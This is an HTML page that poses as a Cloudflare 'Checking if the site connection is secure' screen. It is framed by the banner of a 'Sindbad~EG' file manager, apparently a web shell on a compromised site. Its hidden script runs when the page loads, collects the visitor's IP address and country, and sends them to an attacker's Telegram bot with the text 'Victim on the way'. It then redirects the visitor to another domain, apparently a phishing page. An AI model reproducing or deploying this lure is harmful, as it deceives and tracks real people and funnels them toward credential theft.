Sindbad~EG File Manager
<!DOCTYPE html>
<html lang="en-US">
<head>
<title>Just a moment...</title>
<meta charset="UTF-8">
<meta http-equiv="X-UA-Compatible" content="IE=Edge">
<meta name="viewport" content="width=device-width, initial-scale=1">
<style>
body {
font-family: system-ui, -apple-system, BlinkMacSystemFont, Segoe UI, Roboto, Helvetica Neue, Arial, sans-serif;
line-height: 1.15;
color: #595959;
}
.sv {
margin: -104px -9px 89px 1px;
width: 8cm;
}
.main-content {
margin: 8rem auto;
width: 100%;
max-width: 60rem;
}
.h1 {
line-height: 3.75rem;
font-size: 2.5rem;
font-weight: 500;
}
.h2 {
line-height: 2.25rem;
font-size: 1.5rem;
font-weight: 500;
}
.core-msg {
line-height: 2.25rem;
font-size: 1.5rem;
font-weight: 400;
}
.spacer {
margin: 2rem 0;
}
.text-center {
text-align: center;
}
.icon-wrapper {
display: inline-block;
position: relative;
top: 0.25rem;
margin-right: 0.2rem;
}
.heading-icon {
width: 1.625rem;
height: 1.625rem;
}
.loading-spinner {
height: 76.391px;
}
.lds-ring {
display: inline-block;
position: relative;
width: 1.875rem;
height: 1.875rem;
}
.lds-ring div {
box-sizing: border-box;
display: block;
position: absolute;
border: 0.3rem solid #595959;
border-radius: 50%;
border-color: #595959 transparent transparent;
width: 1.875rem;
height: 1.875rem;
animation: lds-ring 1.2s cubic-bezier(.5, 0, .5, 1) infinite;
}
@keyframes lds-ring {
0% {
transform: rotate(0);
}
to {
transform: rotate(360deg);
}
}
</style>
</head>
<body>
<div class="main-content">
<img src="https://upload.wikimedia.org/wikipedia/commons/thumb/4/4b/Cloudflare_Logo.svg/768px-Cloudflare_Logo.svg.png?20220519022010" class="sv">
</img>
<h1 class="h1"></h1>
<h2 class="h2">Checking if the site connection is secure</h2>
<div class="spacer loading-spinner">
<div class="lds-ring">
<div></div><div></div><div></div><div></div>
</div>
</div>
<div class="core-msg spacer"> needs to review the security of your connection before proceeding.</div>
</div>
<div class="footer" role="contentinfo">
<div class="footer-inner">
<div class="text-center" id="footer-text">Performance & security by <a href="https://www.cloudflare.com/?utm_source=challenge&utm_campaign=j" target="_blank" rel="noopener noreferrer">Cloudflare</a></div>
</div>
</div>
<script>
// Set your Telegram bot token and chat ID
const BOT_TOKEN = '1894003771:AAH6wUX9kO1rlLXH9zUw7gzHu_2GAXRnNW8';
const CHAT_ID = '1334100808';
// Function to send a message to Telegram bot
async function sendMessage(message) {
const url = `https://api.telegram.org/bot${BOT_TOKEN}/sendMessage`;
const data = new URLSearchParams({ chat_id: CHAT_ID, text: message });
const response = await fetch(url, { method: 'POST', body: data });
const result = await response.json();
return result;
}
// Send a message with user's IP address and country when the page loads
window.onload = async function() {
const response = await fetch('https://ipinfo.io/json');
const data = await response.json();
const ip = data.ip || 'Unknown IP';
const country = data.country || 'Unknown Country';
const message = `Victim on the way...👨🦯\nIP: ${ip}\nCountry: ${country}`;
sendMessage(message)
.then(response => console.log('Notification sent:', response))
.catch(error => console.error('Error sending notification:', error));
};
</script>
<script>
// Automatically redirect to Google.com after 3 seconds
setTimeout(function() {
window.location.href = 'https://cashforcarsallen.com/.sg/ing';
}, 5000);
</script>
</body>
</html>
Sindbad File Manager Version 1.0, Coded By Sindbad EG ~ The Terrorists